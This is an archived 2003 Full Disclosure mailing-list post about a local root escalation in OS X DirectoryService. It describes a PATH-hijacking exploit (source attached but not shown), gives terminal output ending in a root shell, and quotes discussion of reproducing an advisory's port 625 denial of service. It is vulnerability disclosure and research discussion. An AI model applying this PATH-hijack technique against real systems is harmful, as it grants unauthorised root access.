Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: OS X DirectoryService DoS {@stake adv:

From: Neeko Oni <neeko () haackey com>
Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)
Hoping to encourage people to figure out what @stake was talking about
in regards to the OS X DirectoryService DoS, I've attached a local
exploit for DirectoryService _once is has been crashed/killed_.

[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~# 



Neeko Oni wrote:


Ok, the PATH problem is self-explanatory (and has been exploited once

the DirectoryService process has crashed) but I've had some difficulty

reproducing the DoS attack claim.  I've got a 10.2.4 machine sitting
right next to me, I believe it's a stock install, but DirectoryService
doesn't bind 625.  DirectoryService doesn't bind any ports and
furthermore nothing binds 625 at all.

Has anyone reproduced the DoS in that advisory?


I also read the advisory and of the two MacOS machines that I am able
to access (only one locally) I can confirm that on the machine that
I don't have local access there was a daemon running on port 625 and
as the advisory states I was able to reproduce the DoS attack. I'm 
not sure exactly which version of MacOS X that machine was running
but the daemon did crash and and refuse connection.

On the machine that I know for a fact is 10.2.4 and have local access to,
DirectoryService was setuid root and was running but there was no port
625 open. I haven't port scanned the machine to check other ports yet
so i'm not ruling out the possibility its running on a different port
just yet.

Has anyone else looked into this matter... ?

-subversive
-- 
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr

Powered by Outblaze

Attachment: osxds.c
Description: C program text

Previous By Date Next
Previous By Thread Next

Current thread: